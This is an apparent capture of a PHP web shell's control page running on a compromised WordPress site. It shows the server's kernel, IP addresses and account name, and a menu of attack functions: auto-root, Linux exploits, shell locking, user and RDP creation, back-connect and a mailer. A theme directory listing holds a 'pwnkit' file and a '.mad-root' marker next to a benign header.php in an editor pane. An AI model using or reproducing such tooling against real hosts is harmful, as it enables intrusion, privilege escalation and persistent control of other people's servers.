Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
tempera /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
803
B
-rw-r--r--
archive.php
2
KB
-rw-r--r--
attachment.php
4.16
KB
-rw-r--r--
author.php
2.69
KB
-rw-r--r--
category.php
1.79
KB
-rw-r--r--
comments.php
1.65
KB
-rw-r--r--
footer.php
655
B
-rw-r--r--
frontpage.php
10.71
KB
-rw-r--r--
functions.php
1.38
KB
-rw-r--r--
header.php
1.67
KB
-rw-r--r--
index.php
738
B
-rw-r--r--
page.php
894
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
32.24
KB
-rw-r--r--
screenshot.png
697.91
KB
-rw-r--r--
search.php
1.67
KB
-rw-r--r--
searchform.php
591
B
-rw-r--r--
sidebar-footer.php
1.74
KB
-rw-r--r--
sidebar-left.php
1.34
KB
-rw-r--r--
sidebar-right.php
1.34
KB
-rw-r--r--
single.php
2.6
KB
-rw-r--r--
style.css
56.77
KB
-rw-r--r--
tag.php
1.78
KB
-rw-r--r--
woocommerce.php
709
B
-rw-r--r--
wpml-config.xml
2.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header * * Displays all of the <head> section and everything up till <div id="main"> * * @package Cryout Creations * @subpackage tempera * @since tempera 0.5 */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <?php cryout_meta_hook(); ?> <meta http-equiv="Content-Type" content="text/html; charset=<?php bloginfo( 'charset' ); ?>" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <?php cryout_header_hook(); wp_head(); ?> </head> <body <?php body_class(); ?>> <?php cryout_body_hook(); ?> <?php /* wp_body_open() call is hooked into cryout_body_hook */ ?> <div id="wrapper" class="hfeed"> <div id="topbar" ><div id="topbar-inner"> <?php cryout_topbar_hook(); ?> </div></div> <?php cryout_wrapper_hook(); ?> <div id="header-full"> <header id="header"> <?php cryout_masthead_hook(); ?> <div id="masthead"> <div id="branding" role="banner" > <?php cryout_branding_hook();?> <?php cryout_header_widgets_hook(); ?> <div style="clear:both;"></div> </div><!-- #branding --> <button id="nav-toggle"><span> </span></button> <nav id="<?php echo apply_filters( 'tempera_mainnav_id', 'access' ) ?>" class="<?php echo apply_filters( 'tempera_mainnav_class', 'jssafe' ) ?>" role="navigation"> <?php cryout_access_hook();?> </nav><!-- #access --> </div><!-- #masthead --> </header><!-- #header --> </div><!-- #header-full --> <div style="clear:both;height:0;"> </div> <div id="main" class="main"> <?php cryout_main_hook(); ?> <div id="forbottom" > <?php cryout_forbottom_hook(); ?> <div style="clear:both;"> </div> <?php cryout_breadcrumbs_hook();?>
Close